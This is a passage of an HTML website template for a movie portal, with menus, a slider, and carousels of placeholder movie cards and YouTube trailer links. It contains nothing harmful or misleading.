<!DOCTYPE html>
<html lang="en">

<head>
    <!--- Basic Page Needs  -->
    <meta charset="utf-8">
    <title>Home One || Movie</title>
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="keywords" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Mobile Specific Meta  -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <!-- CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/jquery-ui.css">
    <link rel="stylesheet" href="css/fontawesome-all.min.css">
    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/plyr.css">
    <link rel="stylesheet" href="css/magnific-popup.css">
    <link rel="stylesheet" href="css/slicknav.min.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/responsive.css">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/png" href="img/favicon.ico">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
</head>

<body>
    <div id="preloader"></div>
    <!-- header-start -->
    <header>
        <div class="header-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-2 col-md-3 col-sm-12 col-12">
                        <div class="logo">
                            <a href="index.html">
                                <img src="img/home1/logo.png" alt="">
                            </a>
                        </div>
                    </div>
                    <div class="col-lg-8 col-md-7 col-sm-12 col-12">
                        <div class="responsive-menu d-lg-none"></div>
                        <div class="menu d-none d-lg-block">
                            <nav>
                                <ul id="menu">
                                    <li>
                                        <a href="index.html">Home</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="index.html">Home One</a>
                                            </li>
                                            <li>
                                                <a href="02_index-2.html">Home Two</a>
                                            </li>
                                            <li>
                                                <a href="03_index-3.html">Home Three</a>
                                                <ul class="third">
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="09_about.html">About</a>
                                    </li>
                                    <li>
                                        <a href="05_feature-movie-grid.html">Movie Layout</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="05_feature-movie-grid.html">Movie Grid</a>
                                            </li>
                                            <li>
                                                <a href="06_feature-movie-list.html">Movie list</a>
                                            </li>
                                            <li>
                                                <a href="04_movie-details.html">Movie Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="10_blog-page.html">Blog</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="10_blog-page.html">Blog</a>
                                            </li>
                                            <li>
                                                <a href="11_blog-details.html">Blog Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li class="mega">
                                        <a href="#">Pages</a>
                                        <ul class="mega-menu">
                                            <li>
                                                <a href="#">Column 1</a>
                                                <ul>
                                                    <li>
                                                        <a href="index.html">Home One</a>
                                                    </li>
                                                    <li>
                                                        <a href="02_index-2.html">Home Two</a>
                                                    </li>
                                                    <li>
                                                        <a href="03_index-3.html">Home Three</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 2</a>
                                                <ul>
                                                    <li>
                                                        <a href="04_movie-details.html">Movie Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="05_feature-movie-grid.html">Movie Feature Grid</a>
                                                    </li>
                                                    <li>
                                                        <a href="06_feature-movie-list.html">Movie Feature List</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 3</a>
                                                <ul>
                                                    <li>
                                                        <a href="07_celebrety-page.html">Celebrety Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="08_celebrety-details.html">Celebrety Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="09_about.html">About</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 4</a>
                                                <ul>
                                                    <li>
                                                        <a href="10_blog-page.html">Blog Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="11_blog-details.html">Blog Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="12_contact.html">Contact</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="12_contact.html">Contacts</a>
                                    </li>
                                </ul>
                            </nav>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-2 col-sm-12 col-12">
                        <div class="account">
                            <a href="#">
                                <span>
                                    <i class="far fa-user"></i>
                                </span>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="header-bottom-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-3 col-md-4 col-sm-12 col-12">
                        <div class="free-ticket">
                            <a href="#">
                                <span>
                                    <i class="far fa-file-video"></i>
                                </span> Friday Bigsow For Free !</a>
                        </div>
                    </div>
                    <div class="col-lg-9 col-md-8 col-sm-12 col-12">
                        <div class="search-signup">
                            <div class="search">
                                <form action="#">
                                    <div class="search-input-box">
                                        <select>
                                            <option>Movie</option>
                                            <option>Serial</option>
                                            <option>Drama</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                        </select>
                                        <input type="text">
                                        <button>
                                            <i class="fas fa-search"></i>
                                        </button>
                                    </div>
                                </form>
                            </div>
                            <div class="signup">
                                <a href="#">Sign up</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- header-start -->
    <!-- slider-area-start -->
    <div class="slider-area slider-carousel owl-carousel">
        <div class="slider-box">
            <div class="img">
                <img src="img/home1/slider-1.jpg" alt="">
            </div>
            <div class="content">
                <div class="sb-content-box">
                    <h3 class="intro animated">Welcome to</h3>
                    <h2 class="title animated">our movie Town</h2>
                    <p class="text animated d-none d-md-block">There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration
                        in some form by injected humour.</p>
                    <div class="buttons">
                        <a class="button hvr-bs animated" href="#">Read More</a>
                        <a class="button hvr-bs animated" href="#">more details</a>
                    </div>
                </div>
            </div>
        </div>
        <div class="slider-box">
            <div class="img">
                <img src="img/home1/slider-2.jpg" alt="">
            </div>
            <div class="content">
                <div class="sb-content-box">
                    <h3 class="intro animated">Welcome to</h3>
                    <h2 class="title animated">our movie Town</h2>
                    <p class="text animated d-none d-md-block">There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration
                        in some form by injected humour.</p>
                    <div class="buttons">
                        <a class="button hvr-bs animated" href="#">Read More</a>
                        <a class="button hvr-bs animated" href="#">more details</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- slider-area-end -->
    <!-- top-movie-area-start -->
    <div class="top-movie-area">
        <div class="container">
            <div class="top-movie-carousel owl-carousel">
                <div class="single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home1/top-movie-1.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">115k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">The Earth Movie</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home1/top-movie-2.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">759k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">The Music Video</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home1/top-movie-3.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">426k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Bokeh Movie (2017)</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home1/top-movie-4.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Gitter Horror Movie</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home1/top-movie-2.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">759k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">The Music Video</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- top-movie-area-end -->
    <!-- upcoming-movie-area-start -->
    <div class="upcoming-movie-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>Upcomming Movies</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-7 col-md-12 col-sm-12 col-12">
                    <div class="upcoming-movie-feature">
                        <div class="umf-single single-top-movie">
                            <div class="img">
                                <a href="04_movie-details.html">
                                    <img src="img/home1/upcoming-b-1.jpg" alt="">
                                </a>
                            </div>
                            <span class="view-counter">759k Views</span>
                            <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                <i class="far fa-play-circle"></i>
                            </a>
                            <div class="content">
                                <h2 class="name">
                                    <a href="04_movie-details.html">Jecu Jek English Horor Movie Lorem Ipsum is there fore always free from.</a>
                                </h2>
                                <div class="rating clearfix">
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-half"></div>
                                </div>
                                <p class="date">October 26, 2018</p>
                                <p class="duration">02 :50 :12</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-5 col-md-12 col-sm-12 col-12">
                    <div class="upcoming-movie-small ums-carousel owl-carousel">
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Sport Life</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Love War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fire Sermon</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fish Warehouse</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Sport Life</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Love War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fire Sermon</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fish Warehouse</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Sport Life</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Love War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fire Sermon</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fish Warehouse</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- upcoming-movie-area-end -->
    <!-- movie-tab-area-start -->
    <div class="movie-tab-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="movie-tab">
                        <ul class="nav nav-tabs" id="myTab" role="tablist">
                            <li class="nav-item">
                                <a class="nav-link active" id="lmovie-tab" data-toggle="tab" href="#lmovie" role="tab" aria-controls="lmovie" aria-selected="true">Letest Movies</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="tshow-tab" data-toggle="tab" href="#tshow" role="tab" aria-controls="tshow" aria-selected="false">Tv Shoes</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="omovie-tab" data-toggle="tab" href="#omovie" role="tab" aria-controls="omovie" aria-selected="false">Old Movies</a>
                            </li>
                        </ul>
                        <div class="tab-content" id="myTabContent">
                            <div class="tab-pane show active" id="lmovie" role="tabpanel" aria-labelledby="lmovie-tab">
                                <div class="tab-carousel owl-carousel">
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Angry Man 6o</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">TDarkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">World War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Nature Beauty 2</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Darkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane" id="tshow" role="tabpanel" aria-labelledby="tshow-tab">
                                <div class="tab-carousel owl-carousel">
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Angry Man 6o</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">TDarkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">World War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Nature Beauty 2</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Darkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane" id="omovie" role="tabpanel" aria-labelledby="omovie-tab">
                                <div class="tab-carousel owl-carousel">
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Angry Man 6o</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
